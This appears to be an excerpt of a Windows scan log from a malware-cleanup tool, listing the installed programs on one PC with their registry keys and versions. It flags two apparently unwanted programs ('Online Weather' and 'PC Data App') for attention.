Adobe After Effects CC 2018 (HKLM-x32\...\AEFT_15_0_0) (Version: 15.0.0 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.3.0.256 - Adobe Systems Incorporated)
Adobe Flash Player 27 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 27.0.0.187 - Adobe Systems Incorporated)
Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.187 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe InDesign CC 2015 (HKLM-x32\...\{BC448016-6F11-1014-B0EA-97CEE6E26CB8}) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.5.1 - Adobe Systems Incorporated)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.1 - Adobe Systems Incorporated)
Adobe premier (HKLM\...\{A33A5D8E-C860-48A7-B8DF-11B354570F70}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2018 (HKLM\...\{7DC3F900-68E5-40F1-869D-9D20A69D8A1D}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2018 (HKLM-x32\...\PPRO_12_0_0) (Version: 12.0.0 - Adobe Systems Incorporated)
Adobe Update Management Tool (HKLM-x32\...\{534A7A1A-7102-4AF6-23EA-7CD279C7B625}_is1) (Version: 8.0 - PainteR)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
AirServer Universal (x64) (HKLM\...\{69380A3E-760E-4AA7-AED4-B10F6FA47B30}) (Version: 5.1.0 - App Dynamic)
AirServer Universal (x64) 4.2.0 (HKLM-x32\...\{a2410454-c7d7-4b07-8d15-217317d48e4c}) (Version: 4.2.0 - AppDynamic ehf)
Akamai NetSession Interface (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Akamai) (Version: - Akamai Technologies, Inc)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 378.49 - NVIDIA Corporation) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{29DB9165-5FC1-48F0-9188-26123F526848}) (Version: 5.0.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{5905C8CF-1C88-4478-A48E-4E458AD1BC7E}) (Version: 5.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{D4D86CB2-2370-4691-8272-3869EDED6C64}) (Version: 10.0.0.18 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Arc (HKLM-x32\...\{CED8E25B-122A-4E80-B612-7F99B93284B3}) (Version: 1.0.0.9668 - Perfect World Entertainment)
ArcSoft PhotoStudio 5.5 (HKLM-x32\...\{85309D89-7BE9-4094-BB17-24999C6118FC}) (Version: - ArcSoft)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.10.0.0 - Asmedia Technology)
Atom (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\atom) (Version: 1.23.3 - GitHub Inc.)
Audacity 2.0.6 (HKLM-x32\...\Audacity_is1) (Version: 2.0.6 - Audacity Team)
AutoCAD 2017 - English (HKLM\...\{28B89EEF-0001-0409-2102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 (HKLM\...\{28B89EEF-0001-0000-0102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 Language Pack - English (HKLM\...\{28B89EEF-0001-0409-1102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk)
Autodesk App Manager 2016-2017 (HKLM-x32\...\{C0954809-F5DC-426C-847E-8409DE14E4C0}) (Version: 2.2.0 - Autodesk)
Autodesk AutoCAD 2017 - English (HKLM\...\AutoCAD 2017 - English) (Version: 21.0.52.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.5 (HKLM-x32\...\{8600F844-9AA5-412E-B6F2-F9C6CBCFD268}) (Version: 1.2.5.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2017 Add-in 64 bit (HKLM\...\{276A67E0-71EB-4827-B5F7-2ACF02BC1A5B}) (Version: 4.37.6853 - Autodesk)
Autodesk Desktop App (HKLM-x32\...\Autodesk Desktop App) (Version: 6.2.0.174 - Autodesk)
Autodesk Featured Apps 2016-2017 (HKLM-x32\...\{27C15055-713B-4D0E-881F-19598A2DFD59}) (Version: 2.2.0 - Autodesk)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk)
Autodesk ReCap 360 (HKLM\...\{5F0F7049-0000-1033-0102-73A6DA3D7FA6}) (Version: 3.0.0.52 - Autodesk) Hidden
Autodesk ReCap 360 (HKLM\...\Autodesk ReCap 360) (Version: 3.0.0.52 - Autodesk)
AVS Audio Converter 8.0 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.0.2.541 - Online Media Technologies Ltd.)
Bastion (HKLM-x32\...\1423058311_is1) (Version: 2.0.0.6 - GOG.com)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.3.0 - EA Digital Illusions CE AB)
bl (HKLM-x32\...\{2A075BB4-E976-4278-BF3F-E5C6945D84C0}) (Version: 1.0.0 - Your Company Name) Hidden
Blender (HKLM\...\{EA3C8A99-1565-44FF-89FC-926CEEB623B5}) (Version: 2.75.1 - Blender Foundation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BurnAware Premium 10.4 (HKLM-x32\...\BurnAware Premium_is1) (Version: - Burnaware)
CanoScan Toolbox Ver4.9 (HKLM-x32\...\{CA9BCD4D-B782-4637-8F1F-F9A328D3C244}) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.12 - Piriform)
Cheat Engine 6.2 (HKLM-x32\...\Cheat Engine 6.2_is1) (Version: - Dark Byte)
Counter-Strike (HKLM-x32\...\Counter-Strike_is1) (Version: - Valve)
CSGO WaRzOnE (HKLM-x32\...\{15932E81-E7D6-477E-BB98-E2D0EABEEF1A}) (Version: 1.36.5.2 - Warzone) Hidden
CSGO WaRzOnE (HKLM-x32\...\CSGO WaRzOnE 1.36.5.2) (Version: 1.36.5.2 - Warzone)
Cuphead (HKLM-x32\...\1963513391_is1) (Version: 20170929 - GOG.com)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Deluge 1.3.12 (HKLM-x32\...\Deluge) (Version: - )
Dev-C++ (HKLM-x32\...\Dev-C++) (Version: 5.11 - Bloodshed Software)
DiskAid 6.4.7.0 (HKLM\...\DiskAid_is1) (Version: 6.4.7.0 - DigiDNA)
Driver Talent (HKLM-x32\...\{29FE44D7-BC89-4188-8B0E-F6BA073C15A5}_is1) (Version: 6.5.52.156 - OSToto Co., Ltd.)
DriverDR 6.3.0 (HKLM\...\DriverDR_is1) (Version: 6.3.0.0 - DriverDR.com)
Droid4X (HKLM-x32\...\Droid4X) (Version: 0.10.3 - Haiyu Dongxiang Co.,Ltd.)
Dropbox (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Dropbox) (Version: 41.4.80 - Dropbox, Inc.)
eBIRForms version v6.0 (HKLM-x32\...\eBIRForms_is1) (Version: v6.0 - )
ESN Sonar (HKLM-x32\...\ESN Sonar-0.70.4) (Version: 0.70.4 - ESN Social Software AB)
FARO LS 1.1.505.0 (64bit) (HKLM-x32\...\{8834451B-6209-4E02-9EF4-4EF9E3C1F70F}) (Version: 5.5.0.44203 - FARO Scanner Production)
FFmpeg (Windows) for Audacity version 2.2.2 (HKLM-x32\...\{9C7E31E3-017F-434C-AC40-24431A354A1E}_is1) (Version: 2.2.2 - )
FileZilla Client 3.30.0 (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\FileZilla Client) (Version: 3.30.0 - Tim Kosse)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
Garena - League of Legends (HKLM-x32\...\LoLPH) (Version: - Garena Online Pte Ltd.)
GeoGebra 5 (HKLM-x32\...\GeoGebra 5) (Version: 5.0.148.0 - International GeoGebra Institute)
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
GitHub Desktop (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\GitHubDesktop) (Version: 1.3.4 - GitHub, Inc.)
Glyph (HKLM-x32\...\Glyph) (Version: - Trion Worlds, Inc.)
Google Cloud Printer (HKLM-x32\...\{74AA24E0-AC50-4B28-BA46-9CF05467C9B7}) (Version: 58.0.3020.0 - Google Inc.)
Google Drive (HKLM-x32\...\{9BC95947-92FD-438B-A168-C01F9A5B7292}) (Version: 2.34.7529.6838 - Google, Inc.)
Google Earth Pro (HKLM-x32\...\{ECF2E224-42F5-4E50-B58E-94CA70E85697}) (Version: 7.3.0.3832 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Graphmatica (HKLM-x32\...\{48366EDF-D329-499F-A91E-637355619790}) (Version: 2.4.2.1 - kSoft)
Hadouken (HKLM-x32\...\{20BBAC53-29AD-4469-B377-08504143B731}) (Version: 5.2.0 - Viktor Elofsson and contributors.)
HP Deskjet 2510 series Basic Device Software (HKLM\...\{293CC68A-32BA-4BA4-84BD-0DCF6583566F}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2510 series Help (HKLM-x32\...\{234DADAD-3C3C-4FB1-90A4-0AF015D56E18}) (Version: 27.0.0 - Hewlett Packard)
HP Deskjet 2510 series Product Improvement Study (HKLM\...\{4B3264AA-951A-4A6B-B837-125224261F12}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2510 series Setup Guide (HKLM-x32\...\{216C7F38-4BBC-4E9A-8392-C9FA21B54386}) (Version: 27.0.0 - Hewlett Packard)
HP Deskjet Ink Adv 2010 K010 Basic Device Software (HKLM\...\{A0B8ECA0-DBE8-4F1B-AA2F-CA864072CAAE}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Update (HKLM-x32\...\{97486FBE-A3FC-4783-8D55-EA37E9D171CC}) (Version: 5.005.000.002 - Hewlett-Packard)
HTC Driver Installer (HKLM-x32\...\{4CEEE5D0-F905-4688-B9F9-ECC710507796}) (Version: 4.17.0.001 - HTC Corporation)
HTC Driver Installer (HKLM-x32\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.007 - HTC Corporation)
iFunbox (v4.0.4106.1352) (HKLM-x32\...\iFunbox_is1) (Version: v4.0.4106.1352 - iFunbox DevTeam)
iLook 310 (HKLM-x32\...\{7EF900F4-61A8-4D95-8A65-488D3BECA206}) (Version: 1.0.4.15 - )
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
IPTInstaller (HKLM-x32\...\{08208143-777D-4A06-BB54-71BF0AD1BB70}) (Version: 4.0.8 - HTC)
iTunes (HKLM\...\{9946A4F7-E0FD-4A33-82D1-06CBFFBBB9F9}) (Version: 12.5.1.21 - Apple Inc.)
Java 7 Update 21 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.210 - Oracle)
Java 8 Update 40 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218040F0}) (Version: 8.0.400 - Oracle Corporation)
Junk Mail filter update (HKLM-x32\...\{F6F30C28-38AA-4DBA-AE0B-7E30238E61BB}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Junkies Client ULTIMATE Version 25.0.0.5 (HKLM-x32\...\{DF64A9F4-94D8-46B4-AF68-DD584CD6DD49}_is1) (Version: - planetcss.com, Inc.)
KeepVid Music(Version 8.2.2) (HKLM-x32\...\{ADBA24FE-D6F6-4B21-97F3-D58A327422E4}_is1) (Version: 8.2.2 - KeepVid)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
League of Legends (HKLM-x32\...\{868EC22E-7E82-4760-9265-3F2E705BF24B}) (Version: 1.25.000 - Riot Games) Hidden
M4a/Flac/Ogg/Ape/Mpc Tag Support Plugin for Media Player v 1.1 (HKLM-x32\...\M4a/Flac/Ogg/Ape/Mpc Tag Support Plugin for Media Player_is1) (Version: 1 - Softpointer Inc)
Manual CanoScan LiDE 25 (HKLM-x32\...\{C45EB9E5-7165-4FB0-8C31-77FC4743362F}) (Version: - )
Mendeley Desktop 1.10.3 (HKLM-x32\...\Mendeley Desktop) (Version: 1.10.3 - Mendeley Ltd.)
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0409-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\SkyDriveSetup.exe) (Version: 17.0.2015.0811 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{49e969a1-2990-464d-92b5-25f6f34573c6}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{d2c8df0e-f15d-4426-9e51-f13f329f9cb4}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25711 (HKLM-x32\...\{1bffbfc8-3cfb-4b1d-aca9-64f1c7c9f811}) (Version: 14.12.25711.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25711 (HKLM-x32\...\{f381fb0a-b38e-44ab-bca5-7f651c8c6b93}) (Version: 14.12.25711.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\{FD9D64F4-CAF5-3D23-845A-B843C78CC1A5}) (Version: 10.0.60830 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Minimal ADB and Fastboot version 1.2 (HKLM-x32\...\{06C90FCC-4C95-4142-A0AF-D3A4C12882DE}_is1) (Version: 1.2 - Sam Rodberg)
MobaXterm (HKLM-x32\...\{0BE362CD-7B7B-4F36-A718-E27C88D288A2}) (Version: 10.5.0.3582 - Mobatek)
Mobile Gamepad Server 1.1 (HKLM-x32\...\Mobile Gamepad Server) (Version: 1.1 - MMH Dev)
Movie Maker (HKLM-x32\...\{45898170-E68C-4F02-AA35-C2186BF347A3}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{B39A6825-EA20-43EA-AB2D-A6BC0298D9A1}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 62.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 62.0.2 (x64 en-US)) (Version: 62.0.2 - Mozilla)
Mozilla Firefox 63.0 (x64 en-US) (HKLM\...\Mozilla Firefox 63.0 (x64 en-US)) (Version: 63.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.3 - Mozilla)
MSI Kombustor v4 0.6.3.3 (64-bit) (HKLM-x32\...\{F3D3CC6B-9AD7-4F43-8C69-40D5902FDC5C}}_is1) (Version: - MSI / Geeks3D)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
netcut version 3.5.4 (HKLM-x32\...\{6BE5152F-0885-4AA5-8385-4AD2D8472C71}_is1) (Version: 3.5.4 - arcai.com)
NiceHash Miner 2 0.2.2 (only current user) (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\08059810-bc78-5c10-942c-2092eebb5ec8) (Version: 0.2.2 - NiceHash d.o.o)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.4.5 - Notepad++ Team)
Nullsoft Install System (HKLM-x32\...\NSIS) (Version: 3.0 - )
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.3 - )
NVIDIA Graphics Driver 378.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 378.49 - NVIDIA Corporation)
NVIDIA Performance (HKLM-x32\...\InstallShield_{7C7F30F4-94E7-4AA8-8941-90C4A80C68BF}) (Version: 1.00.0000 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NVIDIA System Monitor (HKLM-x32\...\InstallShield_{E9CFBE78-ED91-4FCF-9E6F-210E477E527D}) (Version: 1.00.0000 - NVIDIA Corporation)
NVIDIA System Update (HKLM-x32\...\InstallShield_{6F69C969-2942-4E7B-B594-75B37664B8BA}) (Version: 1.00.0000 - NVIDIA Corporation)
NVIDIA Update 2.13.0.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.13.0.21 - NVIDIA Corporation)
Online Weather (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Online Weather) (Version: 1.0 - Somoto Ltd.) <==== ATTENTION
osu! (HKLM-x32\...\{0998cd4a-f2df-409b-81ae-4e160cc2e821}) (Version: latest - ppy Pty Ltd)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM-x32\...\{90150000-001F-040C-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
PC Data App (HKLM-x32\...\PCData App) (Version: - ) <==== ATTENTION
PdaNet+ for Android 4.19 (HKLM-x32\...\PdaNet_is1) (Version: - June Fabrics Technology Inc)
ph (HKLM-x32\...\{185F9795-9663-4F13-9EF9-307A282ADB5A}) (Version: 1.0.0 - Your Company Name) Hidden
PhotoScape (HKLM-x32\...\PhotoScape) (Version: - )
PHStat2 3.0.6 (HKLM-x32\...\{E52EB7D5-0DAD-4C4B-B1F1-D233577DF224}) (Version: 3.06 - Pearson Education, Inc.)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Pidgin (HKLM-x32\...\Pidgin) (Version: 2.12.0 - )
PrinterShare 2.3.07 (HKLM\...\{FA9BB954-1D36-4DD9-8E6B-45A1183F59B6}) (Version: 2.3.7.0 - Printer Anywhere Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
Python 2.7.14 (HKLM-x32\...\{0398A685-FD8D-46B3-9816-C47319B0CF5E}) (Version: 2.7.14150 - Python Software Foundation)
Python 3.0.1 (64-bit) (HKLM\...\{de2f2d9c-53e2-40ee-8209-74da63cb060f}) (Version: 3.0.1150 - Python Software Foundation)
Python 3.6.5 (32-bit) (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{1890a32b-7881-4df6-8cc1-70fb0471662e}) (Version: 3.6.5150.0 - Python Software Foundation)
Python Launcher (HKLM-x32\...\{C093353B-F9EE-4A06-923D-C1B340B82886}) (Version: 3.6.6119.0 - Python Software Foundation)
R for Windows 3.1.0 (HKLM\...\R for Windows 3.1.0_is1) (Version: 3.1.0 - R Core Team)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.45.516.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7661 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver and Utility (HKLM-x32\...\{0DF70CB6-553A-4C57-8E6D-876322ECFB78}) (Version: 1.00.0179 - REALTEK Semiconductor Corp.)
Revo Uninstaller Pro 3.1.5 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.5 - VS Revo Group, Ltd.)
ROBLOX Player for Betts (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{373B1718-8CC5-4567-8EE2-9033AD08A680}) (Version: - ROBLOX Corporation)
ROBLOX Studio 2013 for Betts (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{2922D6F1-2865-4EFA-97A9-94EEAB3AFA14}) (Version: - ROBLOX Corporation)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.5.8 - Rockstar Games)
RStudio (HKLM-x32\...\RStudio) (Version: 0.98.953 - RStudio)
Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (HKLM-x32\...\{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15024.8 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15024.8 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
ScanSoft OmniPage SE 4.0 (HKLM-x32\...\{C1E693A4-B1D5-4DCD-B68D-2087835B7184}) (Version: 15.00.0020 - Nuance Communications, Inc.)
SketchUp Import 2016-2017 (HKLM-x32\...\{063925DB-9D8C-48E2-8F04-1B7038B6C783}) (Version: 2.2.0 - Autodesk)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 6.14 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.14.104 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Hidden
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.)
Smart Technology Programming Software 7.0.1.12 (HKLM\...\{C745CDDF-A4EA-4448-87ED-D17F83B0EE39}) (Version: 7.0.1.12 - Mad Catz)
Spotify (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Spotify) (Version: 1.0.92.390.g2ce5ec7d - Spotify AB)
Task Killer (remove only) (HKLM-x32\...\Task Killer) (Version: - )
Unity Web Player (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\UnityWebPlayer) (Version: 5.3.2f1 - Unity Technologies ApS)
Uplay (HKLM-x32\...\Uplay) (Version: 46.0 - Ubisoft)
USBPcap 1.2.0.3 (HKLM\...\USBPcap) (Version: 1.2.0.3 - Tomasz Mon)
Viber (HKLM-x32\...\{703E9CCF-0578-4AF0-B1F7-90368CFDC8DD}) (Version: 5.3.0.1884 - Viber Media Inc.) Hidden
Viber (HKLM-x32\...\{86B6B943-6740-425C-9968-43EDEBEE6742}) (Version: 6.2.0.1306 - Viber Media Inc.) Hidden
Viber (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{d96d3a07-b1fd-4625-b739-627196eb9aac}) (Version: 6.2.0.1306 - Viber Media Inc.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Vulkan Run Time Libraries 1.0.37.0 (HKLM\...\VulkanRT1.0.37.0) (Version: 1.0.37.0 - LunarG, Inc.)
Watch_Dogs (HKLM-x32\...\Uplay Install 274) (Version: - Ubisoft)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 4.1 - Sysprogs)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (08/27/2012 7.0.0000.00001) (HKLM\...\1211A86ED343708C73F297C8FB074FB60918D24D) (Version: 08/27/2012 7.0.0000.00001 - Google, Inc.)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (08/28/2014 11.0.0000.00000) (HKLM\...\092555911492C6959D2596D612F52DCA71881CA2) (Version: 08/28/2014 11.0.0000.00000 - Google, Inc.)
Windows Driver Package - Microsoft PS Vita Type B (02/22/2013 6.1.7600.16385) (HKLM\...\A0EC80B5719D4DA4CF40C9219D7CB9CCAD6DBA40) (Version: 02/22/2013 6.1.7600.16385 - Microsoft)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windroy version 0.5.5 (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{7E07052F-A4CE-4932-B066-B9203888439F}_is1) (Version: 0.5.5 - Windroy, Inc.)
WinISO (HKLM-x32\...\WinISO) (Version: 6.4.0.5092 - WinISO Computing Inc.)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
WinSCP 5.13.4 (HKLM-x32\...\winscp3_is1) (Version: 5.13.4 - Martin Prikryl)
Wooxy version 1.5.0.7 (HKLM-x32\...\{C183CD14-47D8-4F98-AF06-4744CB834C8E}_is1) (Version: 1.5.0.7 - Chewy)
Yawcam 0.4.1 (HKLM-x32\...\{8FE96B14-E1F9-47BF-8BA1-A81467CD259B}_is1) (Version: - )

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
